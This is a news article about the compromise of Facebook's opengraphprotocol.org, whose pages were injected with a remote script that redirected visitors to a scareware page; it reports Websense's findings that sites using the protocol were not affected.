14 DAY TRIAL // An website operated by Facebook to provide information about the Open Graph protocol has been compromised and its pages were injected with malicious scripts.
Facebook invented the Open Graph protocol in order to allow developers to create pages that have the same functionality as Facebook ones.
The infection on the opengraphprotocol.org website was discovered by security researchers from Web and email security vendor Websense, who note that all of its pages were affected.
The attackers managed to inject a <script> element, which loads a file called ko.php from a remote server, right before the end of the body tag.
This rogue script triggers a series of redirects, that eventually land visitors on a scareware distribution page displaying a fake antivirus scan.
Scareware, or rogueware, are terms referring to applications, which pose as antivirus software and attempt to scare users into paying for license keys.
They try to achieve this by displaying bogus security alerts about infections allegedly found on their computers and claiming that more paid-only components are required for proper removal.
To use the Open Graph porotocol, developers have to define special meta properties for their pages and declare as special XML namespace (xmlns) of og="http://opengraphprotocol.org/schema/".
But, even though every page on opengraphprotocol.org was infected, it doesn't mean that websites using the protocol have also been affected.
"It's very important to note that Web sites that use the Open Graph API [...], will NOT serve malicious content to their users," the Websense researchers stress.
"This is because the schema link is an informational link only, it doesn't get loaded as part of the page, nor does it provide a clickable link to the user," they explain.
The Facebook security team was alerted and cleaned the website in record time, however, the incident shows that even experienced Web coders, like the ones employed by Facebook, can sometimes make mistakes and leave security holes open.